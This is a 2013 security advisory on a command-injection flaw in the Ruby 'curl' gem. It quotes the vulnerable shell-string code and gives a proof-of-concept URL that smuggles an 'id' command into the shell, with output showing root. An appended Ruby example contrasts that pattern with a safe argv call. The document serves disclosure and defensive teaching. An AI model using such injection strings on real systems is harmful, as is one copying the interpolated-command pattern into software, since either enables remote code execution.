
[Full-disclosure] Curl Ruby Gem Remote command execution



<html><body><div><h2>Curl Ruby Gem Remote command execution<br>
3/12/2013
<hr>
</h2>
<p><a href="https://github.com/tg0/curl">https://github.com/tg0/curl</a>
</p>
<p>Specially crafted URLs can result in remote code execution:
</p>
<p>In ./lib/curl.rb the following lines:
</p>
<pre>131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} #{ref}  \"#{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)
</pre>
<dl><dt>PoC:</dt></dl>
<p>page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
</p>
<p>larry@underfl0w:/tmp$ cat p<br>
uid=0(root) gid=0(root) groups=0(root)
</p>
<p>Larry W. Cashdollar<br>
@_larry0<br>
<a href="http://vapid.dhs.org">http://vapid.dhs.org</a>
</p></div></body></html>
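
An added example (not from the advisory or the gem's code base) that contrasts the interpolated command string shown at lines 131-135 with an argv-array call that never reaches a shell. A child Ruby process stands in for curl so the block runs offline; the function names, the stand-in and the sample URL are assumptions made for the illustration.

```ruby
require "open3"
require "rbconfig"
require "shellwords"
require "uri"

# Stand-in for the curl binary so this runs offline: a child Ruby process
# that prints every argument it receives on its own line.
ECHO_ARGV = [RbConfig.ruby, "-e", "ARGV.each { |a| puts a }"].freeze

# Constructed input: a URL carrying a double quote and shell separators.
HOSTILE_URL = 'http://example.invalid/";echo INJECTED;"'.freeze

# Vulnerable pattern, as in lib/curl.rb: the URL is interpolated into one
# string that /bin/sh parses, so its embedded quote ends the quoting early.
def run_interpolated(url)
  cmd = "#{Shellwords.join(ECHO_ARGV)} \"#{url}\""
  out, _err, _status = Open3.capture3(cmd)
  out.lines.map(&:chomp)
end

# Hardened pattern: each argument is its own argv element and no shell is
# involved, so the URL reaches the child process as a single opaque string.
def run_argv(url)
  out, _status = Open3.capture2(*ECHO_ARGV, url)
  out.lines.map(&:chomp)
end

# Defense in depth: accept only well-formed http(s) URLs before any exec.
def http_url?(url)
  uri = URI.parse(url)
  (uri.is_a?(URI::HTTP) && !uri.host.to_s.empty?)
rescue URI::InvalidURIError
  false
end

if __FILE__ == $PROGRAM_NAME
  p run_interpolated(HOSTILE_URL)
  p run_argv(HOSTILE_URL)
  p http_url?(HOSTILE_URL)
end
```

In the interpolated form the stand-in receives only the text before the embedded quote and the shell runs the remainder as a separate command; in the argv form the whole URL arrives as one argument.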